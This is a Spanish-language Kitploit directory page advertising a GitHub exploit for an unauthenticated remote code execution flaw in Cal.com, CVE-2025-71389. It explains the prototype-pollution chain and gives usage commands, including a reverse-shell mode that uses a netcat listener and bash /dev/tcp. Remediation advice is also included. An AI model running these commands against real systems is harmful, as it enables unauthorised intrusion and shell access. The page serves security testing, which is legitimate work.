Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-71389_exploit | Kitploit
Herramientas/GitHubGitHub/0xdak/cve-2025-71389_exploit
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xdak/cve-2025-71389_exploit

CVE-2025-71389_exploit

Ver Repositorio
hace 23 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-71389 — Cal.com RCE no autenticado (react2shell)

Ejecución remota de código no autenticada en Cal.com <= 5.9.8 mediante el fallo de deserialización "Flight" de los React Server Components — "react2shell" (CVE-2025-55182 en React, CVE-2025-66478 en Next.js).

Cal.com incluye un Next.js 15.x vulnerable. Una única solicitud POST / no autenticada que lleva una cabecera Next-Action y un payload Flight multipart construido recorre una cadena de prototype pollution (__proto__:then + constructor:constructor) hasta un eval del lado del servidor, alcanzando child_process.execSync. La salida del comando se devuelve en línea en el campo digest del error RSC. Sin autenticación, sin interacción del usuario — una sola solicitud es RCE.

  • Afectado: Cal.com <= 5.9.8 (Next.js 15.x / 16.x App Router con RSC)
  • Corregido en: Cal.com 5.9.9 (actualiza el Next.js incluido)
  • Puerto por defecto: 3000
  • CWE: 502 / 94
  • Subyacente: CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
# comando único (la salida vuelve en la respuesta)
python3 exploit.py http://10.10.10.10:3000/ -c 'id'
python3 exploit.py http://10.10.10.10:3000/ -c 'cat /root/proof.txt'

# shell inversa interactiva (primero ejecuta `nc -lvnp 4444`)
python3 exploit.py http://10.10.10.10:3000/ --shell 10.10.14.5:4444

El comando único devuelve su salida en línea mediante el digest del error RSC. El modo --shell lanza una shell inversa bash /dev/tcp desprendida con setsid (el contenedor del objetivo es Debian e incluye bash).

Remediación

Actualiza Cal.com a >= 5.9.9 (cualquier Next.js parcheado: 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7). No expongas el manejador de funciones de servidor RSC a clientes no confiables y no ejecutes el contenedor de la aplicación como root.

Aviso legal

Solo para pruebas de seguridad autorizadas y educación. Úsalo únicamente contra sistemas que poseas o para los que tengas permiso explícito de prueba.

Descargar herramienta